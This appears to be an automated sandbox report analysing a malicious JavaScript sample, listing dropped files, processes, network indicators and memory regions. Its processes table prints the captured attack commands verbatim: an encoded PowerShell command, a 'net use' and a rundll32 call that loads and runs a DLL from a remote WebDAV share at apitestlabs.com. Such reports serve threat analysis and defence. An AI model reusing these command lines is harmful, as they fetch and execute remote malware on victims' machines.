Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1933725401135087429.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbgit5it.yr0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zsr2ev.mv3.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://apitestlabs.com:8888/
|
unknown
|
||
|
http://apitestlabs.com:8888/V7
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://apitestlabs.com:8888/%
|
unknown
|
||
|
http://apitestlabs.com:8888/em
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
apitestlabs.com
|
94.159.113.48
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
apitestlabs.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
20DA0E34000
|
heap
|
page read and write
|
||
|
1BD01A87000
|
heap
|
page read and write
|
||
|
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
|
1BD7ED20000
|
heap
|
page read and write
|
||
|
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
|
20DA0AFC000
|
heap
|
page read and write
|
||
|
1BD01A67000
|
heap
|
page read and write
|
||
|
246B1F7D000
|
trusted library allocation
|
page read and write
|
||
|
181FFFE000
|
stack
|
page read and write
|
||
|
1BD01A84000
|
heap
|
page read and write
|
||
|
20DA0B43000
|
heap
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
1BD7F095000
|
heap
|
page read and write
|
||
|
1BD01A57000
|
heap
|
page read and write
|
||
|
1BD01A58000
|
heap
|
page read and write
|
||
|
1BD7F8B9000
|
heap
|
page read and write
|
||
|
F5DD6DA000
|
stack
|
page read and write
|
||
|
1BD7EDC0000
|
heap
|
page read and write
|
||
|
1BD01A88000
|
heap
|
page read and write
|
||
|
52AAD3E000
|
stack
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
|
246A00C2000
|
heap
|
page read and write
|
||
|
2BCB95B4000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
|
246A2394000
|
trusted library allocation
|
page read and write
|
||
|
2BCB935F000
|
heap
|
page read and write
|
||
|
246A013C000
|
heap
|
page read and write
|
||
|
52AA87F000
|
stack
|
page read and write
|
||
|
2BCB937B000
|
heap
|
page read and write
|
||
|
246A02F0000
|
heap
|
page read and write
|
||
|
246A1BC5000
|
heap
|
page read and write
|
||
|
246A0250000
|
trusted library allocation
|
page read and write
|
||
|
1BD7EE2F000
|
heap
|
page read and write
|
||
|
246BA176000
|
heap
|
page execute and read and write
|
||
|
7FFD3449D000
|
trusted library allocation
|
page execute and read and write
|
||
|
52AA9FD000
|
stack
|
page read and write
|
||
|
1BD7EE46000
|
heap
|
page read and write
|
||
|
7FFD34576000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD7F09D000
|
heap
|
page read and write
|
||
|
1BD7F09B000
|
heap
|
page read and write
|
||
|
246A1F2B000
|
trusted library allocation
|
page read and write
|
||
|
1BD7EDEB000
|
heap
|
page read and write
|
||
|
1BD0141E000
|
heap
|
page read and write
|
||
|
1BD01A51000
|
heap
|
page read and write
|
||
|
52AAFBE000
|
stack
|
page read and write
|
||
|
18205FE000
|
stack
|
page read and write
|
||
|
2BCB9440000
|
heap
|
page read and write
|
||
|
1BD01A67000
|
heap
|
page read and write
|
||
|
7FFD3454C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD7EE46000
|
heap
|
page read and write
|
||
|
246A2026000
|
trusted library allocation
|
page read and write
|
||
|
BAD447C000
|
stack
|
page read and write
|
||
|
1BD7EE26000
|
heap
|
page read and write
|
||
|
18202FF000
|
stack
|
page read and write
|
||
|
246A00EE000
|
heap
|
page read and write
|
||
|
F5DD75E000
|
stack
|
page read and write
|
||
|
BAD41CE000
|
stack
|
page read and write
|
||
|
246BA2A0000
|
heap
|
page read and write
|
||
|
246A225E000
|
trusted library allocation
|
page read and write
|
||
|
246BA180000
|
heap
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
246A200F000
|
trusted library allocation
|
page read and write
|
||
|
1BD7FB34000
|
heap
|
page read and write
|
||
|
2BCB9348000
|
heap
|
page read and write
|
||
|
F5DDA7E000
|
stack
|
page read and write
|
||
|
246A02FE000
|
heap
|
page read and write
|
||
|
52AA97F000
|
stack
|
page read and write
|
||
|
246A0280000
|
heap
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
246A23DE000
|
trusted library allocation
|
page read and write
|
||
|
246BA1A0000
|
heap
|
page read and write
|
||
|
1BD01A87000
|
heap
|
page read and write
|
||
|
1BD01A74000
|
heap
|
page read and write
|
||
|
20DA0B38000
|
heap
|
page read and write
|
||
|
246A22C7000
|
trusted library allocation
|
page read and write
|
||
|
1BD7EE46000
|
heap
|
page read and write
|
||
|
1BD01A87000
|
heap
|
page read and write
|
||
|
52AAAFE000
|
stack
|
page read and write
|
||
|
1BD01A91000
|
heap
|
page read and write
|
||
|
246A23B6000
|
trusted library allocation
|
page read and write
|
||
|
246BA0BB000
|
heap
|
page read and write
|
||
|
1BD01A67000
|
heap
|
page read and write
|
||
|
1BD01A87000
|
heap
|
page read and write
|
||
|
1BD01A98000
|
heap
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page execute and read and write
|
||
|
246A2009000
|
trusted library allocation
|
page read and write
|
||
|
246BA4A0000
|
heap
|
page read and write
|
||
|
1BD7F09B000
|
heap
|
page read and write
|
||
|
1BD7F090000
|
heap
|
page read and write
|
||
|
52AAC3E000
|
stack
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
BAD40CA000
|
stack
|
page read and write
|
||
|
246A2064000
|
trusted library allocation
|
page read and write
|
||
|
246A02F5000
|
heap
|
page read and write
|
||
|
1BD01A64000
|
heap
|
page read and write
|
||
|
1BD7EE30000
|
heap
|
page read and write
|
||
|
20DA0AD0000
|
heap
|
page read and write
|
||
|
246BA280000
|
heap
|
page read and write
|
||
|
20DA0AFC000
|
heap
|
page read and write
|
||
|
20DA0B0C000
|
heap
|
page read and write
|
||
|
1BD7F420000
|
heap
|
page read and write
|
||
|
20DA0B04000
|
heap
|
page read and write
|
||
|
1BD7EC40000
|
heap
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
18206FE000
|
stack
|
page read and write
|
||
|
1BD01A70000
|
heap
|
page read and write
|
||
|
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
|
52AAEBF000
|
stack
|
page read and write
|
||
|
1BD7EE2A000
|
heap
|
page read and write
|
||
|
52AA5F3000
|
stack
|
page read and write
|
||
|
2BCBC710000
|
heap
|
page read and write
|
||
|
1BD01A67000
|
heap
|
page read and write
|
||
|
7DF4271B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD01A87000
|
heap
|
page read and write
|
||
|
1BD01A7A000
|
heap
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
|
246A2414000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
|
246A2017000
|
trusted library allocation
|
page read and write
|
||
|
246BA170000
|
heap
|
page execute and read and write
|
||
|
1BD01A60000
|
heap
|
page read and write
|
||
|
20DA0B07000
|
heap
|
page read and write
|
||
|
246A00F4000
|
heap
|
page read and write
|
||
|
2BCB95B0000
|
heap
|
page read and write
|
||
|
1BD01A55000
|
heap
|
page read and write
|
||
|
246BA05C000
|
heap
|
page read and write
|
||
|
246A244A000
|
trusted library allocation
|
page read and write
|
||
|
1BD7F09D000
|
heap
|
page read and write
|
||
|
1BD01A68000
|
heap
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
246A2020000
|
trusted library allocation
|
page read and write
|
||
|
20DA0B43000
|
heap
|
page read and write
|
||
|
F5DD7DE000
|
stack
|
page read and write
|
||
|
181FEF4000
|
stack
|
page read and write
|
||
|
246A1F99000
|
trusted library allocation
|
page read and write
|
||
|
20DA0B25000
|
heap
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
2BCB9540000
|
heap
|
page read and write
|
||
|
1BD01A8C000
|
heap
|
page read and write
|
||
|
1BD01B57000
|
heap
|
page read and write
|
||
|
52AACB6000
|
stack
|
page read and write
|
||
|
246A0230000
|
trusted library allocation
|
page read and write
|
||
|
1BD7EE2B000
|
heap
|
page read and write
|
||
|
246A010E000
|
heap
|
page read and write
|
||
|
246BA296000
|
heap
|
page read and write
|
||
|
20DA0AD8000
|
heap
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
|
1BD01A64000
|
heap
|
page read and write
|
||
|
1BD7ED40000
|
heap
|
page read and write
|
||
|
246A1F72000
|
trusted library allocation
|
page read and write
|
||
|
246BA293000
|
heap
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
|
2BCB9355000
|
heap
|
page read and write
|
||
|
246BA2B0000
|
heap
|
page read and write
|
||
|
20DA0D30000
|
remote allocation
|
page read and write
|
||
|
2BCBC713000
|
heap
|
page read and write
|
||
|
1BD01A96000
|
heap
|
page read and write
|
||
|
1BD7EE23000
|
heap
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
246A0240000
|
heap
|
page readonly
|
||
|
2BCB934F000
|
heap
|
page read and write
|
||
|
246A2444000
|
trusted library allocation
|
page read and write
|
||
|
20DA0D30000
|
remote allocation
|
page read and write
|
||
|
20DA0B2D000
|
heap
|
page read and write
|
||
|
246A00B0000
|
heap
|
page read and write
|
||
|
7FFD3464A000
|
trusted library allocation
|
page read and write
|
||
|
1BD01A8B000
|
heap
|
page read and write
|
||
|
1BD01A86000
|
heap
|
page read and write
|
||
|
246BA130000
|
heap
|
page execute and read and write
|
||
|
7FFD34641000
|
trusted library allocation
|
page read and write
|
||
|
2BCBAEA0000
|
heap
|
page read and write
|
||
|
52AABF9000
|
stack
|
page read and write
|
||
|
BAD457F000
|
stack
|
page read and write
|
||
|
20DA0BE0000
|
heap
|
page read and write
|
||
|
1BD01A52000
|
heap
|
page read and write
|
||
|
18204FF000
|
stack
|
page read and write
|
||
|
1BD01A5C000
|
heap
|
page read and write
|
||
|
1BD01A9A000
|
heap
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
1BD01A91000
|
heap
|
page read and write
|
||
|
1BD7EE46000
|
heap
|
page read and write
|
||
|
18203FF000
|
stack
|
page read and write
|
||
|
246A01D0000
|
heap
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
2469FF90000
|
heap
|
page read and write
|
||
|
246A2012000
|
trusted library allocation
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
2BCB934B000
|
heap
|
page read and write
|
||
|
20DA0B32000
|
heap
|
page read and write
|
||
|
1BD7EE46000
|
heap
|
page read and write
|
||
|
246A1F11000
|
trusted library allocation
|
page read and write
|
||
|
1BD0142C000
|
heap
|
page read and write
|
||
|
52AAE3E000
|
stack
|
page read and write
|
||
|
246BA2C5000
|
heap
|
page read and write
|
||
|
246A1BB0000
|
heap
|
page execute and read and write
|
||
|
246B1F11000
|
trusted library allocation
|
page read and write
|
||
|
20DA0B04000
|
heap
|
page read and write
|
||
|
2BCB9337000
|
heap
|
page read and write
|
||
|
52AAF3F000
|
stack
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BCBCBD0000
|
trusted library allocation
|
page read and write
|
||
|
20DA0CC0000
|
heap
|
page read and write
|
||
|
20DA0E30000
|
heap
|
page read and write
|
||
|
246B1F1F000
|
trusted library allocation
|
page read and write
|
||
|
20DA0B2A000
|
heap
|
page read and write
|
||
|
2BCBC720000
|
heap
|
page read and write
|
||
|
1BD7F09D000
|
heap
|
page read and write
|
||
|
20DA0B31000
|
heap
|
page read and write
|
||
|
246A0136000
|
heap
|
page read and write
|
||
|
1BD7F779000
|
heap
|
page read and write
|
||
|
52AB03B000
|
stack
|
page read and write
|
||
|
52AA8FE000
|
stack
|
page read and write
|
||
|
246BA0DC000
|
heap
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
2BCB9520000
|
heap
|
page read and write
|
||
|
1BD01A7E000
|
heap
|
page read and write
|
||
|
246BA020000
|
heap
|
page read and write
|
||
|
52AAB7E000
|
stack
|
page read and write
|
||
|
20DA0B38000
|
heap
|
page read and write
|
||
|
7FFD34546000
|
trusted library allocation
|
page read and write
|
||
|
20DA0CE0000
|
heap
|
page read and write
|
||
|
7FFD34493000
|
trusted library allocation
|
page execute and read and write
|
||
|
18208FB000
|
stack
|
page read and write
|
||
|
1BD01A67000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
1BD7EE3A000
|
heap
|
page read and write
|
||
|
246A1F33000
|
trusted library allocation
|
page read and write
|
||
|
246BA0D0000
|
heap
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
246A00B8000
|
heap
|
page read and write
|
||
|
1BD7EE39000
|
heap
|
page read and write
|
||
|
20DA0B38000
|
heap
|
page read and write
|
||
|
20DA0B25000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
246A0210000
|
trusted library allocation
|
page read and write
|
||
|
246A00F0000
|
heap
|
page read and write
|
||
|
1BD01A9B000
|
heap
|
page read and write
|
||
|
246A00FA000
|
heap
|
page read and write
|
||
|
52AAA7F000
|
stack
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
246A1BC0000
|
heap
|
page read and write
|
||
|
BAD44FC000
|
stack
|
page read and write
|
||
|
1BD01A68000
|
heap
|
page read and write
|
||
|
1BD01A5C000
|
heap
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
1BD01A50000
|
heap
|
page read and write
|
||
|
246BA05E000
|
heap
|
page read and write
|
||
|
1BD01A7C000
|
heap
|
page read and write
|
||
|
2BCB95BB000
|
heap
|
page read and write
|
||
|
2BCB9365000
|
heap
|
page read and write
|
||
|
20DA0D30000
|
remote allocation
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
52AADBB000
|
stack
|
page read and write
|
||
|
246A0070000
|
heap
|
page read and write
|
||
|
1BD01A6C000
|
heap
|
page read and write
|
||
|
1BD01A74000
|
heap
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
1BD016A4000
|
heap
|
page read and write
|
||
|
7FFD34672000
|
trusted library allocation
|
page read and write
|
||
|
246BA106000
|
heap
|
page read and write
|
||
|
1BD01A67000
|
heap
|
page read and write
|
||
|
246BA094000
|
heap
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
1BD01A75000
|
heap
|
page read and write
|
||
|
1BD01A52000
|
heap
|
page read and write
|
||
|
1BD7EE72000
|
heap
|
page read and write
|
||
|
1BD01A91000
|
heap
|
page read and write
|
||
|
2BCB934B000
|
heap
|
page read and write
|
||
|
BAD414F000
|
stack
|
page read and write
|
||
|
52AAD38000
|
stack
|
page read and write
|
||
|
246A0090000
|
heap
|
page read and write
|
||
|
2BCB9330000
|
heap
|
page read and write
|
||
|
246A200C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34492000
|
trusted library allocation
|
page read and write
|
||
|
246A206B000
|
trusted library allocation
|
page read and write
|
||
|
1BD01A60000
|
heap
|
page read and write
|
||
|
246A0196000
|
heap
|
page read and write
|
||
|
18200FE000
|
stack
|
page read and write
|
||
|
20DA0B0C000
|
heap
|
page read and write
|
||
|
246A2023000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
246A0138000
|
heap
|
page read and write
|
||
|
20DA0B43000
|
heap
|
page read and write
|
||
|
7FFD345B0000
|
trusted library allocation
|
page execute and read and write
|
There are 276 hidden memdumps, click here to show them.